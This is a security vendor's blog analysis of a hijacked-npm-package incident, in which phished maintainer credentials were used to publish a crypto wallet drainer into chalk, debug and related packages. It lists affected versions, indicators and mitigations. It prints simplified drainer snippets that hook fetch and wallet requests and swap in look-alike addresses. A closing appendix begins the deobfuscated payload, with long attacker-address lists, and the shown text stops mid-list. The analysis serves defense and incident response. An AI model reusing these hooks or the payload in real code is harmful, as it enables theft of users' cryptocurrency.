npm Supply Chain Attack: Multiple Popular Packages Hijacked (1B+ Weekly Downloads)
SafeDep Team
• • 18 min readTable of Contents
TL;DR
A sophisticated crypto wallet drainer has been discovered in multiple popular npm packages with over one billion collective weekly downloads. The malware uses obfuscation techniques and targets browser based cryptocurrency wallets by hijacking network requests and directly manipulating wallet APIs. Analysis of one of the compromised packages, [email protected] package reveals a 76KB payload disguised within a legitimate 1KB utility.
npm user qix confirmed in his bluesky feed about a 2FA reset phishing attack that led to his account being compromised. Attackers leveraged his compromised account to publish the malicious packages under his account.
Compromised Packages
The following packages contained crypto wallet drainer malware:
| Package Name | Weekly Downloads | Version |
|---|---|---|
| ansi-styles | 371m+ | 6.2.2 |
| debug | 358m+ | 4.4.2 |
| chalk | 300m+ | 5.6.1 |
| supports-color | 287m+ | 10.2.1 |
| strip-ansi | 261m+ | 7.1.1 |
| ansi-regex | 244m+ | 6.2.1 |
| wrap-ansi | 198m+ | 9.0.1 |
| color-convert | 194m+ | 3.1.1 |
| color-name | 192m+ | 2.0.1 |
| is-arrayish | 74m+ | 0.3.3 |
| slice-ansi | 60m+ | 7.1.1 |
| error-ex | 47m+ | 1.3.3 |
| color-string | 27m+ | 2.1.1 |
| simple-swizzle | 26m+ | 0.2.3 |
| supports-hyperlinks | 19m+ | 4.1.1 |
| has-ansi | 12m+ | 6.0.1 |
| chalk-template | 4m+ | 1.1.1 |
| backslash | 0.25m+ | 0.2.1 |
Impact: Packages with over one billion weekly downloads have been compromised, potentially affecting millions of applications and users.
How to Check if You Are Affected
Step 1: Check Your Dependencies
Run this command in your project directory:
npm ls ansi-styles debug chalk supports-color \ strip-ansi ansi-regex wrap-ansi color-convert \ color-name is-arrayish slice-ansi error-ex \ color-string simple-swizzle supports-hyperlinks \ has-ansi chalk-template backslashStep 2: Identify Compromised Versions
Look for these specific indicators of compromise:
- Versions: Check if the versions of the packages are compromised.
- Obfuscated code: Large blocks of encoded or minified JavaScript
- Installation scripts: Unexpected
postinstallorinstallscripts - Bundle size increases: Packages significantly larger than expected
Step 3: Check for Wallet Activity
If you used applications built with these packages:
- Review Recent Transactions: Check all crypto transactions from the past 30 days
- Look for Address Changes: Compare intended recipient addresses with actual transaction recipients
- Monitor These Addresses: Watch for funds sent to these attacker addresses:
0x66a9893cC07D91D95644AEDD05D03f95e1dBA8Af0x10ed43c718714eb63d5aa57b78b54704e256024e0x13f4ea83d0bd40e75c8222255bc855a974568dd40x1111111254eeb25477b68fb85ed929f73a9605820xd9e1ce17f2641f24ae83637ab66a2cca9c378b9f
Step 4: Browser Inspection
Check if your browser was compromised:
// Open browser console (F12) and run:console.log(typeof fetch.toString === 'function' ? fetch.toString() : 'Native function');// If output contains unusual code, your browser may be compromisedHow SafeDep Tools Can Help
At SafeDep, we continuously monitor open source packages for supply chain threats. Suspicious packages are flagged by our security tools.
Near Real-time Protection
Detection Capabilities
Our automated systems can detect:
- Risky API calls using static code analysis
- Suspicious installation scripts
- Embedded executables
- Unusual network activity
- Code obfuscation patterns
- Supply chain anomalies
In-Depth Technical Analysis
Analysis of [email protected]
Our analysis of [email protected] reveals the sophistication of this supply chain attack:
Package Anomalies:
- File Size:
index.jsbloated from less than 1KB to 76,594 bytes - Legitimate Author: Published under trusted maintainer “Sindre Sorhus”
- Code Structure: Legitimate import followed by massive obfuscated payload
// Legitimate codeimport ansiRegex from 'ansi-regex';const regex = ansiRegex({onlyFirst: true});
// Followed by 76KB of obfuscated malwareconst _0x112fa8=_0x180f;(function(_0x13c8b9,_0x35f660){// ... long lines of obfuscated code ...Multi-Stage Attack Architecture
Stage 1: Advanced Obfuscation System
- String Array Shuffling: Dynamic string decoding to prevent static analysis
- Decoder Functions:
_0x180ffunction converts indexes to actual strings - Anti-Analysis: Code breaks if obfuscation setup isn’t executed properly
Stage 2: Environmental Detection
// Deobfuscated wallet detection logicasync function checkethereumw() { try { const accounts = await window['ethereum']['request']({ method: 'eth_accounts', }); if (accounts.length > 0) { runmask(); // Active wallet found - direct hijack } else { newdlocal(); // Wallet present but not connected } } catch (error) { newdlocal(); // No wallet or error - network hijack only }}Stage 3: Network Traffic Interception
The malware completely replaces browser networking APIs. Example code:
// Simplified fetch hijackingconst originalFetch = fetch;fetch = async function (...args) { const response = await originalFetch(...args); const clonedResponse = response.clone();
// Read and modify response data const responseBody = await clonedResponse.json(); const modifiedBody = replaceAddressesInData(responseBody);
// Return modified response to application return new Response(JSON.stringify(modifiedBody), { status: response.status, headers: response.headers, });};Stage 4: Cryptocurrency Address Detection
Supports multiple blockchain formats using regex patterns:
- Ethereum:
/\b0x[a-fA-F0-9]{40}\b/g - Bitcoin Legacy:
/\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b/g - Bitcoin SegWit:
/\bbc1[a-z0-9]{39,59}\b/g - Solana:
/((?<!\w)[1-9A-HJ-NP-Za-km-z]{32,44})/g - Tron:
/((?<!\w)[T][A-Za-z1-9]{33})/g
Stage 5: Visual Similarity Address Replacement
Uses Levenshtein distance algorithm to find visually similar attacker addresses:
// Simplified closest match functionfunction findClosestMatch(victimAddress, attackerAddresses) { let minDistance = Infinity; let bestMatch = null;
for (let attackerAddr of attackerAddresses) { const distance = calculateLevenshteinDistance(victimAddress, attackerAddr); if (distance < minDistance) { minDistance = distance; bestMatch = attackerAddr; } } return bestMatch;}Example: Replaces bc1qxy2kgdygjrsqtzq2n0yrf2493p83kkfjhx0wlh with bc1qxy2kgdygjrsqtzq2n0yrf2493p83kkfjhx0w2p
Direct Wallet API Manipulation
For connected wallets, the malware hooks transaction methods:
// Intercepts eth_sendTransaction callsconst originalRequest = window.ethereum.request;window.ethereum.request = async function (args) { if (args.method === 'eth_sendTransaction') { // Replace 'to' address with attacker's address args.params[0].to = '...'; // Attacker's address } return originalRequest.call(this, args);};Lessons Learned
This attack highlights critical supply chain vulnerabilities:
- Dependency Trust: Even popular packages can be compromised
- Bundle Analysis: Large, unexpected bundle sizes should trigger alerts
- Crypto Security: Browser-based wallets are vulnerable to JavaScript attacks
- Detection Tools: Automated scanning is essential for early detection
Indicators of Compromise (IOCs)
Wallet Addresses
0xfc4a4858bafef54d1b1d7697bfb5c52f4c166976; // Attacker's address0x66a9893cc07d91d95644aedd05d03f95e1dba8af;0x10ed43c718714eb63d5aa57b78b54704e256024e;0x13f4ea83d0bd40e75c8222255bc855a974568dd4;0x1111111254eeb25477b68fb85ed929f73a960582;0xd9e1ce17f2641f24ae83637ab66a2cca9c378b9f;Technical Signatures
Code-level Detection:
- Function signatures:
_0x180f,_0x112fa8,checkethereumw,newdlocal - String patterns:
"eth_accounts","window.ethereum"in obfuscated form - Regex patterns for crypto addresses (see technical analysis above)
- Levenshtein distance calculation functions
Behavioral Indicators:
- Abnormal file sizes (76KB+ for simple utilities)
fetchandXMLHttpRequestmonkey-patching- Dynamic string array shuffling on package load
- Browser wallet detection logic
- Network traffic interception and modification
Package-level Red Flags:
- Legitimate packages with sudden massive size increases
- Obfuscated code in otherwise readable libraries
- Installation scripts in packages that don’t require compilation
- Multiple encoded string arrays at file beginning
Conclusion
Impact Assessment
This represents the largest npm supply chain attack discovered to date, targeting cryptocurrency users through popular JavaScript packages.
Scale:
- Over one billion weekly downloads across 21 compromised packages
- Millions of applications potentially affected
- Global reach through popular utility packages like
chalk,debug,ansi-styles
Sophistication Level:
- Advanced obfuscation requiring dynamic analysis to detect
- Multi-chain support targeting 6+ different cryptocurrencies
- Social engineering via visual similarity address replacement
- Dual attack vectors (network hijacking + direct wallet manipulation)
Financial Risk:
- Immediate theft of any crypto transactions while malware is active
- Ongoing exposure until all affected applications are cleaned
- User trust impact on the broader JavaScript/npm ecosystem
The attack demonstrates that even trusted, popular packages can be weaponized for cryptocurrency theft. The use of legitimate maintainer accounts and subtle trojanization techniques makes detection extremely difficult without automated security scanning.
Mitigation and Protection
Immediate Steps
- Remove Affected Packages: Immediately remove or downgrade affected packages
- Audit Transaction History: Check recent crypto transactions for unauthorized address changes
- Wallet Security: Use hardware wallets for all crypto transactions
- Manual Verification: Always manually verify recipient addresses before confirming transactions
Long-term Protection
- Dependency Auditing: Use tools like SafeDep vet for continuous dependency monitoring
- Lock File Management: Maintain strict version control with package-lock.json
- Code Review: Implement mandatory code review for all dependency updates
- Network Monitoring: Monitor for suspicious crypto-related network requests
References
- https://github.com/chalk/chalk/issues/656#issuecomment-3267043996
- https://jdstaerk.substack.com/p/we-just-found-malicious-code-in-the
- https://news.ycombinator.com/item?id=45169657
- https://github.com/debug-js/debug/issues/1005#issuecomment-3266885191
Appendix
Malicious Payload
Following is the deobfuscated version of the [email protected]/index.js file, deobfuscated using https://obf-io.deobfuscate.io/:
var neth = 0;var rund = 0;var loval = 0;async function checkethereumw() { try { const _0x124ed3 = await window.ethereum.request({ method: 'eth_accounts', }); if (_0x124ed3.length > 0) { runmask(); if (rund != 1) { rund = 1; neth = 1; newdlocal(); } } else if (rund != 1) { rund = 1; newdlocal(); } } catch (_0x53a897) { if (rund != 1) { rund = 1; newdlocal(); } }}if (typeof window != 'undefined' && typeof window.ethereum != 'undefined') { checkethereumw();} else if (rund != 1) { rund = 1; newdlocal();}function newdlocal() { const _0xba16ef = { zprkq: function (_0x23e86b, _0x5b593c) { return _0x23e86b + _0x5b593c; }, iJAYR: function (_0xc91263, _0x20ad3a) { return _0xc91263 <= _0x20ad3a; }, nqxhl: function (_0x31d70d, _0x545869) { return _0x31d70d <= _0x545869; }, myaXd: function (_0xd587f7, _0x356cb8) { return _0xd587f7 === _0x356cb8; }, IptyQ: function (_0x52d73c, _0x1701dc) { return _0x52d73c - _0x1701dc; }, QCTBQ: function (_0x3b97a6, _0x5cd5e9) { return _0x3b97a6 - _0x5cd5e9; }, avmeH: function (_0x370f68, _0x51151b) { return _0x370f68 - _0x51151b; }, TwyPu: function (_0x43ced5, _0x54174b) { return _0x43ced5 + _0x54174b; }, arczN: function (_0x2b592d, _0x5339ba) { return _0x2b592d - _0x5339ba; }, yMgZR: function (_0xb3fb8a, _0x24a479) { return _0xb3fb8a - _0x24a479; }, qEVKr: function (_0x4a3a26, _0x16853b) { return _0x4a3a26 - _0x16853b; }, vGpiX: function (_0x9c66ab, _0x1a38b9, _0x1d740b) { return _0x9c66ab(_0x1a38b9, _0x1d740b); }, eGWOd: function (_0x3630fa, _0x17694b) { return _0x3630fa < _0x17694b; }, tfqRA: function (_0x562199, ..._0x1555b8) { return _0x562199(..._0x1555b8); }, viQtk: 'Content-Type', DSXar: 'application/json', mDaWt: function (_0x2116fd, _0x26f622) { return _0x2116fd(_0x26f622); }, FXtyf: function (_0x4f1346, _0x53343b) { return _0x4f1346 === _0x53343b; }, FYAPh: 'string', UmfJm: function (_0x301d56, _0x29139b) { return _0x301d56 === _0x29139b; }, LmXxC: function (_0x467473, _0x5d7154) { return _0x467473(_0x5d7154); }, yVHgJ: 'responseText', aXpuC: 'response', yArwb: 'object', MJKcn: function (_0x5561bf, _0x1792e6) { return _0x5561bf !== _0x1792e6; }, gHrJP: function (_0xe2c323, _0x4c49d0) { return _0xe2c323 === _0x4c49d0; }, OiGzk: '1H13VnQJKtT4HjD5ZFKaaiZEetMbG7nDHx', EAhsy: '1Li1CRPwjovnGHGPTtcKzy75j37K6n97Rd', lLQUz: '1Dk12ey2hKWJctU3V8Akc1oZPo1ndjbnjP', ibPEr: '1NBvJqc1GdSb5uuX8vT7sysxtT4LB8GnuY', cGpnb: '1Mtv6GsFsbno9XgSGuG6jRXyBYv2tgVhMj', wAGlT: '1BBAQm4DL78JtRdJGEfzDBT2PBkGyvzf4N', Hauzr: '1KkovSeka94yC5K4fDbfbvZeTFoorPggKW', nJNgC: '18CPyFLMdncoYccmsZPnJ5T1hxFjh6aaiV', EHOlV: '1BijzJvYU2GaBCYHa8Hf3PnJh6mjEd92UP', cOZYT: '1Bjvx6WXt9iFB5XKAVsU3TgktgeNbzpn5N', cIySf: '19fUECa9aZCQxcLeo8FZu8kh5kVWheVrg8', rrGeC: '1DZEep7GsnmBVkbZR3ogeBQqwngo6x4XyR', geUVS: '1GX1FWYttd65J26JULr9HLr98K7VVUE38w', TZdxq: '14mzwvmF2mUd6ww1gtanQm8Bxv3ZWmxDiC', JgcFw: '1EYHCtXyKMMhUiJxXJH4arfpErNto5j87k', gKbQq: '19D1QXVQCoCLUHUrzQ4rTumqs9jBcvXiRg', KObJu: '16mKiSoZNTDaYLBQ5LkunK6neZFVV14b7X', vYGdx: '18x8S4yhFmmLUpZUZa3oSRbAeg8cpECpne', gtZOV: '1EkdNoZJuXTqBeaFVzGwp3zHuRURJFvCV8', ApfqP: '13oBVyPUrwbmTAbwxVDMT9i6aVUgm5AnKM', hgmsX: '1DwsWaXLdsn4pnoMtbsmzbH7rTj5jNH6qS', TNgNB: '13wuEH28SjgBatNppqgoUMTWwuuBi9e4tJ', UhmAX: '154jc6v7YwozhFMppkgSg3BdgpaFPtCqYn', vXyJx: '1AP8zLJE6nmNdkfrf1piRqTjpasw7vk5rb', HmJHn: '19F8YKkU7z5ZDAypxQ458iRqH2ctGJFVCn', UlhFZ: '17J3wL1SapdZpT2ZVX72Jm5oMSXUgzSwKS', VShzV: '16z8D7y3fbJsWFs3U8RvBF3A8HLycCW5fH', IzSNV: '1PYtCvLCmnGDNSVK2gFE37FNSf69W2wKjP', hiXcO: '143wdqy6wgY3ez8Nm19AqyYh25AZHz3FUp', gwsfo: '1JuYymZbeoDeH5q65KZVG3nBhYoTK9YXjm', XjToi: '1PNM2L1bpJQWipuAhNuB7BZbaFLB3LCuju', qzLJJ: '19onjpqdUsssaFKJjwuAQGi2eS41vE19oi', NrttU: '1JQ15RHehtdnLAzMcVT9kU8qq868xFEUsS', mLamd: '1LVpMCURyEUdE8VfsGqhMvUYVrLzbkqYwf', ENfnx: '1KMcDbd2wecP4Acoz9PiZXsBrJXHbyPyG6', teGcp: '1DZiXKhBFiKa1f6PTGCNMKSU1xoW3Edb7Z', lkQtS: '174bEk62kr8dNgiduwHgVzeLgLQ38foEgZ', nVfSu: '17cvmxcjTPSBsF1Wi2HfcGXnpLBSzbAs6p', XdmQg: '1NoYvnedUqNshKPZvSayfk8YTQYvoB2wBc', hTAuL: '13694eCkAtBRkip8XdPQ8ga99KEzyRnU6a', hmVdI: 'bc1qms4f8ys8c4z47h0q29nnmyekc9r74u5ypqw6wm', SvssU: 'bc1qznntn2q7df8ltvx842upkd9uj4atwxpk0whxh9', zXlNj: 'bc1q4rllc9q0mxs827u6vts2wjvvmel0577tdsvltx', OOAQz: 'bc1qj8zru33ngjxmugs4sxjupvd9cyh84ja0wjx9c4', TDfnH: 'bc1qc972tp3hthdcufsp9ww38yyer390sdc9cvj8ar', UrAmA: 'bc1qw0z864re8yvrjqmcw5fs6ysndta2avams0c6nh', ELPqV: 'bc1qzdd8c7g2g9mnnxy635ndntem2827ycxxyn3v4h', xlnbk: 'bc1qaavgpwm98n0vtaeua539gfzgxlygs8jpsa0mmt', aApMn: 'bc1qrdlkyhcrx4n2ksfjfh78xnqrefvsr34nf2u0sx', Pvsjl: 'bc1q9ytsyre66yz56x3gufhqks7gqd8sa8uk4tv5fh', fmvYL: 'bc1qfrvsj2dkey2dg8ana0knczzplcqr7cgs9s52vq', fXywx: 'bc1qg7lkw04hg5yggh28ma0zvtkeg95k0yefqmvv2f', RRxbR: 'bc1qmeplum3jy2vrlyzw4vhrcgeama35tr9kw8yfrn', VrdPL: 'bc1qamqx0h8rxfcs4l56egrpau4ryqu4r642ttmxq4', qSKMT: 'bc1qsaxgtck26mgecgfvp9ml4y5ljyl8ylpdglqz30', mbTQq: 'bc1qsz90ulta8dx5k8xzzjqruzahav2vxchtk2l8v7', xHmCb: 'bc1q3ad2zyc5mpc9nnzmmtxqpu467jeh4m928r7qf4', OqeMw: 'bc1qlrdqrulwmvfg86rmp77k8npdefns52ykk8cxs6', BNnlw: 'bc1q5hqxk5ugvf2d3y6qj2a7cy7u79ckusu9eknpsr', FkDWd: 'bc1qszm3nugttmtpkq77dhphtqg4u7vuhxxcrh7f79', aBdRe: 'bc1qqc09xnyafq0y4af3x7j5998tglxcanjuzy974m', roief: 'bc1qqqh29zxfzxk0fvmq9d7hwedh5yz44zhf7e23qz', qMxmV: 'bc1qsg57tpvfj6gysrw5w4sxf3dweju40g87uuclvu', kkYGi: 'bc1qje95nehs8y0wvusp2czr25p7kghk6j3cvgugy5', zbnSH: 'bc1qwrnchp96p38u8ukp8jc8cq22q35n3ajfav0pzf', dHxYm: 'bc1q6l99s704jccclxx5rc2x2c5shlgs2pg0fpnflk', OfXMz: 'bc1qeuk2u6xl4rgfq0x9yc37lw49kutnd8gdlxt9st', OZznV: 'bc1qxul8lwxvt7lt9xuge0r2jls7evrwyyvcf2ah0u', NHzcN: 'bc1qcplvxyzs9w09g6lpglj6xxdfxztfwjsgz95czd', sxqWF: 'bc1q9ca9ae2cjd3stmr9lc6y527s0x6vvqys6du00u', oIQra: 'bc1qmap3cqss3t4vetg8z9s995uy62jggyxjk29jkp', qIAwe: 'bc1qg3c6c7y5xeqkxnjsx9ymclslr2sncjrxjylkej', IneJW: 'bc1q9zx63qdjwldxp4s9egeqjelu3y5yqsajku8m29', tjIgE: 'bc1ql2awtv7nzcp2dqce3kny2ra3dz946c9vg2yukq', vuJMD: 'bc1qhytpe64tsrrvgwm834q35w6607jc6azqtnvl2a', Uxzul: 'bc1q4rlgfgjwg9g2pqwqkf5j9hq6ekn39rjmzv09my', MoAYB: 'bc1q28ks0u6fhvv7hktsavnfpmu59anastfj5sq8dw', wKaGs: 'bc1qjqfpxvl2j2hzx2cxeqhchrh02dcjy3z5k6gv55', VmOdy: 'bc1q8zznzs9z93xpkpunrmeqp6fg54s3q7dkh9z9xw', YcvKY: 'bc1qt4c4e6xwt5dz4p629ndz9zmeep2kmvqgy53037', FlhWy: '0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976', sCKdW: '0xa29eeFb3f21Dc8FA8bce065Db4f4354AA683c024', ZAiba: '0x40C351B989113646bc4e9Dfe66AE66D24fE6Da7B', AsHKD: '0x30F895a2C66030795131FB66CBaD6a1f91461731', rzrhZ: '0x57394449fE8Ee266Ead880D5588E43501cb84cC7', expPy: '0xCd422cCC9f6e8f30FfD6F68C0710D3a7F24a026A', zlBwY: '0x7C502F253124A88Bbb6a0Ad79D9BeD279d86E8f4', nElAL: '0xe86749d6728d8b02c1eaF12383c686A8544de26A', wqRjK: '0xa4134741a64F882c751110D3E207C51d38f6c756', HcYDT: '0xD4A340CeBe238F148034Bbc14478af59b1323d67', BqNRF: '0xB00A433e1A5Fc40D825676e713E5E351416e6C26', OvURa: '0xd9Df4e4659B1321259182191B683acc86c577b0f', PFfEj: '0x0a765FA154202E2105D7e37946caBB7C2475c76a', IOjJb: '0xE291a6A58259f660E8965C2f0938097030Bf1767', uKfqV: '0xe46e68f7856B26af1F9Ba941Bc9cd06F295eb06D', DAJYA: '0xa7eec0c4911ff75AEd179c81258a348c40a36e53', SUVoY: '0x3c6762469ea04c9586907F155A35f648572A0C3E', WJmWS: '0x322FE72E1Eb64F6d16E6FCd3d45a376efD4bC6b2', QBAXK: '0x51Bb31a441531d34210a4B35114D8EF3E57aB727', zLNIR: '0x314d5070DB6940C8dedf1da4c03501a3AcEE21E1', kTQGi: '0x75023D76D6cBf88ACeAA83447C466A9bBB0c5966', XJxSR: '0x1914F36c62b381856D1F9Dc524f1B167e0798e5E', kHjMo: '0xB9e9cfd931647192036197881A9082cD2D83589C', kxPDg: '0xE88ae1ae3947B6646e2c0b181da75CE3601287A4', gWISZ: '0x0D83F2770B5bDC0ccd9F09728B3eBF195cf890e2', hIHlD: '0xe2D5C35bf44881E37d7183DA2143Ee5A84Cd4c68', QgItq: '0xd21E6Dd2Ef006FFAe9Be8d8b0cdf7a667B30806d', bLJZU: '0x93Ff376B931B92aF91241aAf257d708B62D62F4C', IdVSI: '0x5C068df7139aD2Dedb840ceC95C384F25b443275', Rpwne: '0x70D24a9989D17a537C36f2FB6d8198CC26c1c277', NYUBp: '0x0ae487200606DEfdbCEF1A50C003604a36C68E64', eQrXq: '0xc5588A6DEC3889AAD85b9673621a71fFcf7E6B56', yRdVI: '0x3c23bA2Db94E6aE11DBf9cD2DA5297A09d7EC673', IDnjA: '0x5B5cA7d3089D3B3C6393C0B79cDF371Ec93a3fd3', ajXoV: '0x4Cb4c0E7057829c378Eb7A9b174B004873b9D769', xyHoE: '0xd299f05D1504D0B98B1D6D3c282412FD4Df96109', TCqKY: '0x241689F750fCE4A974C953adBECe0673Dc4956E0', dQfUy: '0xBc5f75053Ae3a8F2B9CF9495845038554dDFb261', ctRhh: '0x5651dbb7838146fCF5135A65005946625A2685c8', JbMdu: '0x5c9D146b48f664f2bB4796f2Bb0279a6438C38b1', gjuIU: '0xd2Bf42514d35952Abf2082aAA0ddBBEf65a00BA3', fmDjk: '0xbB1EC85a7d0aa6Cd5ad7E7832F0b4c8659c44cc9', GjipQ: '0x013285c02ab81246F1D68699613447CE4B2B4ACC', wHLUW: '0x97A00E100BA7bA0a006B2A9A40f6A0d80869Ac9e', gYVeZ: '0x4Bf0C0630A562eE973CE964a7d215D98ea115693', Sqlrp: '0x805aa8adb8440aEA21fDc8f2348f8Db99ea86Efb', pcqRS: '0xae9935793835D5fCF8660e0D45bA35648e3CD463', fMapR: '0xB051C0b7dCc22ab6289Adf7a2DcEaA7c35eB3027', ITrjn: '0xf7a82C48Edf9db4FBe6f10953d4D889A5bA6780D', Ixxxa: '0x06de68F310a86B10746a4e35cD50a7B7C8663b8d', DdqMx: '0x51f3C0fCacF7d042605ABBE0ad61D6fabC4E1F54', mddEm: '0x49BCc441AEA6Cd7bC5989685C917DC9fb58289Cf', GQlpD: '0x7fD999f778c1867eDa9A4026fE7D4BbB33A45272', PFPfJ: '0xe8749d2347472AD1547E1c6436F267F0EdD725Cb', rgsmH: '0x2B471975ac4E4e29D110e43EBf9fBBc4aEBc8221', kkUbC: '0x02004fE6c250F008981d8Fc8F9C408cEfD679Ec3', qHwwv: '0xC4A51031A7d17bB6D02D52127D2774A942987D39', mlgET: '0xa1b94fC12c0153D3fb5d60ED500AcEC430259751', Sflwm: '0xdedda1A02D79c3ba5fDf28C161382b1A7bA05223', cKcDU: '0xE55f51991C8D01Fb5a99B508CC39B8a04dcF9D04', tWKKt: '5VVyuV5K6c2gMq1zVeQUFAmo8shPZH28MJCVzccrsZG6', GeUXv: '98EWM95ct8tBYWroCxXYN9vCgN7NTcR6nUsvCx1mEdLZ', IFMoj: 'Gs7z9TTJwAKyxN4G3YWPFfDmnUo3ofu8q2QSWfdxtNUt', shIUB: 'CTgjc8kegnVqvtVbGZfpP5RHLKnRNikArUYFpVHNebEN', IfmWW: '7Nnjyhwsp8ia2W4P37iWAjpRao3Bj9tVZBZRTbBpwXWU', aLjQi: '3KFBge3yEg793VqVV1P6fxV7gC9CShh55zmoMcGUNu49', ytLpw: '9eU7SkkFGWvDoqSZLqoFJ9kRqJXDQYcEvSiJXyThCWGV', gjXjd: '4SxDspwwkviwR3evbZHrPa3Rw13kBr51Nxv86mECyXUF', alqyK: '9dtS7zbZD2tK7oaMUj78MKvgUWHbRVLQ95bxnpsCaCLL', tySZZ: '7mdCoRPc1omTiZdYY2xG81EvGwN7Z2yodUTX9ZmLm3fx', wEEzD: '8rdABs8nC2jTwVhR9axWW7WMbGZxW7JUzNV5pRF8KvQv', PFTuz: '55YtaEqYEUM7ASAZ9XmVdSBNy6F7r5zkdLsJFv2ZPtAx', uMBVu: 'Gr8Kcyt8UVRF1Pux7YHiK32Spm7cmnFVL6hd7LSLHqoB', gGKEH: '9MRmVsciWKDvwwTaZQCK2NvJE2SeVU8W6EGFmukHTRaB', QlDwm: '5j4k1Ye12dXiFMLSJpD7gFrLbv4QcUrRoKHsgo32kRFr', PbcYH: 'F1SEspGoVLhqJTCFQEutTcKDubw44uKnqWc2ydz4iXtv', isJWQ: 'G3UBJBY69FpDbwyKhZ8Sf4YULLTtHBtJUvSX4GpbTGQn', NORtg: 'DZyZzbGfdMy5GTyn2ah2PDJu8LEoKPq9EhAkFRQ1Fn6K', OWMqm: 'HvygSvLTXPK4fvR17zhjEh57kmb85oJuvcQcEgTnrced', mAOhu: 'TB9emsCq6fQw6wRk4HBxxNnU6Hwt1DnV67', zNJib: 'TSfbXqswodrpw8UBthPTRRcLrqWpnWFY3y', JIaJy: 'TYVWbDbkapcKcvbMfdbbcuc3PE1kKefvDH', ycYrn: 'TNaeGxNujpgPgcfetYwCNAZF8BZjAQqutc', YofCH: 'TJ1tNPVj7jLK2ds9JNq15Ln6GJV1xYrmWp', iKJKA: 'TGExvgwAyaqwcaJmtJzErXqfra66YjLThc', oQtxT: 'TC7K8qchM7YXZPdZrbUY7LQwZaahdTA5tG', Gnngl: 'TQuqKCAbowuQYEKB9aTnH5uK4hNvaxDCye', AIOZX: 'TFcXJysFgotDu6sJu4zZPAvr9xHCN7FAZp', LBXrZ: 'TLDkM4GrUaA13PCHWhaMcGri7H8A8HR6zR', GcWUu: 'TPSLojAyTheudTRztqjhNic6rrrSLVkMAr', uWYHo: 'TY2Gs3RVwbmcUiDpxDhchPHF1CVsGxU1mo', AjRST: 'TCYrFDXHBrQkqCPNcp6V2fETk7VoqjCNXw', OghhW: 'TKcuWWdGYqPKe98xZCWkmhc1gKLdDYvJ2f', WYxMs: 'TP1ezNXDeyF4RsM3Bmjh4GTYfshf5hogRJ', XPQAU: 'TJcHbAGfavWSEQaTTLotG7RosS3iqV5WMb', kQfYh: 'TD5U7782gp7ceyrsKwekWFMWF9TjhC6DfP', fQZCx: 'TEu3zgthJE32jfY6bYMYGNC7BU2yEXVBgW', UzPHF: 'TK5r74dFyMwFSTaJF6dmc2pi7A1gjGTtJz', qJMvq: 'TBJH4pB4QPo96BRA7x6DghEv4iQqJBgKeW', sZVdB: 'TKBcydgFGX9q3ydaPtxht1TRAmcGybRozt', zzvgO: 'TQXoAYKPuzeD1X2c4KvQ4gXhEnya3AsYwC', maiTu: 'TJCevwYQhzcSyPaVBTa15y4qNY2ZxkjwsZ', ZpFNE: 'THpdx4MiWbXtgkPtsrsvUjHF5AB4u7mx3E', jTVMz: 'TWpCDiY8pZoY9dVknsy3U4mrAwVm8mCBh6', zBKSx: 'TK5zyFYoyAttoeaUeWGdpRof2qRBbPSV7L', CsfLH: 'TAzmtmytEibzixFSfNvqqHEKmMKiz9wUA9', LCszu: 'TCgUwXe3VmLY81tKBrMUjFBr1qPnrEQFNK', cdzQW: 'TTPWAyW3Q8MovJvDYgysniq41gQnfRn21V', xBxZT: 'TWUJVezQta4zEX94RPmFHF2hzQBRmYiEdn', ESuTT: 'TPeKuzck7tZRXKh2GP1TyoePF4Rr1cuUAA', emvMl: 'TJUQCnHifZMHEgJXSd8SLJdVAcRckHGnjt', xVGnF: 'TCgX32nkTwRkapNuekTdk1TByYGkkmcKhJ', hxLhB: 'TFDKvuw86wduSPZxWTHD9N1TqhXyy9nrAs', EeQvC: 'TQVpRbBzD1au3u8QZFzXMfVMpHRyrpemHL', pELnW: 'TSE2VkcRnyiFB4xe8an9Bj1fb6ejsPxa9Z', qzqrf: 'THe32hBm9nXnzzi6YFqYo8LX77CMegX3v5', ZjUWz: 'TXfcpZtbYfVtLdGPgdoLm6hDHtnrscvAFP', LieOP: 'TXgVaHDaEyXSm1LoJEqFgKWTKQQ1jgeQr7', pPSEL: 'TD5cRTn9dxa4eodRWszGiKmU4pbpSFN87P', Cubxg: 'LNFWHeiSjb4QB4iSHMEvaZ8caPwtz4t6Ug', tdnnB: 'LQk8CEPMP4tq3mc8nQpsZ1QtBmYbhg8UGR', WBSil: 'LMAJo7CV5F5scxJsFW67UsY2RichJFfpP6', aiczm: 'LUvPb1VhwsriAm3ni77i3otND2aYLZ8fHz', RVLCn: 'LhWPifqaGho696hFVGTR1KmzKJ8ps7ctFa', UpXNN: 'LZZPvXLt4BtMzEgddYnHpUWjDjeD61r5aQ', FOnBW: 'LQfKhNis7ZKPRW6H3prbXz1FJd29b3jsmT', iMpIh: 'LSihmvTbmQ9WZmq6Rjn35SKLUdBiDzcLBB', mynAv: 'Ldbnww88JPAP1AUXiDtLyeZg9v1tuvhHBP', LthXt: 'LR3YwMqnwLt4Qdn6Ydz8bRFEeXvpbNZUvA', thBMJ: 'Lbco8vJ56o1mre6AVU6cF7JjDDscnYHXLP', SDnYd: 'LfqFuc3sLafGxWE8vdntZT4M9NKq6Be9ox', rsFGZ: 'LLcmXxj8Zstje6KqgYb11Ephj8bGdyF1vP', GERuP: 'LcJwR1WvVRsnxoe1A66pCzeXicuroDP6L6', YnKTx: 'LUNKimRyxBVXLf9gp3FZo2iVp6D3yyzJLJ', qeLYC: 'LY1NnVbdywTNmq45DYdhssrVENZKv7Sk8H', bHFpc: 'LNmMqhqpyDwb1zzZReuA8aVUxkZSc4Ztqq', yJtyM: 'LdxgXRnXToLMBML2KpgGkdDwJSTM6sbiPE', UthzI: 'LZMn8hLZ2kVjejmDZiSJzJhHZjuHq8Ekmr', HRVKG: 'LVnc1MLGDGKs2bmpNAH7zcHV51MJkGsuG9', DYFsg: 'LRSZUeQb48cGojUrVsZr9eERjw4K1zAoyC', vJoTb: 'LQpGaw3af1DQiKUkGYEx18jLZeS9xHyP9v', SCttQ: 'LiVzsiWfCCkW2kvHeMBdawWp9TE8uPgi6V', TLtwe: 'LY32ncFBjQXhgCkgTAd2LreFv3JZNTpMvR', zubSd: 'LdPtx4xqmA4HRQCm3bQ9PLEneMWLdkdmqg', jnPSm: 'LYcHJk7r9gRbg2z3hz9GGj91Po6TaXDK3k', tkhoC: 'LMhCVFq5fTmrwQyzgfp2MkhrgADRAVCGsk', UXYpW: 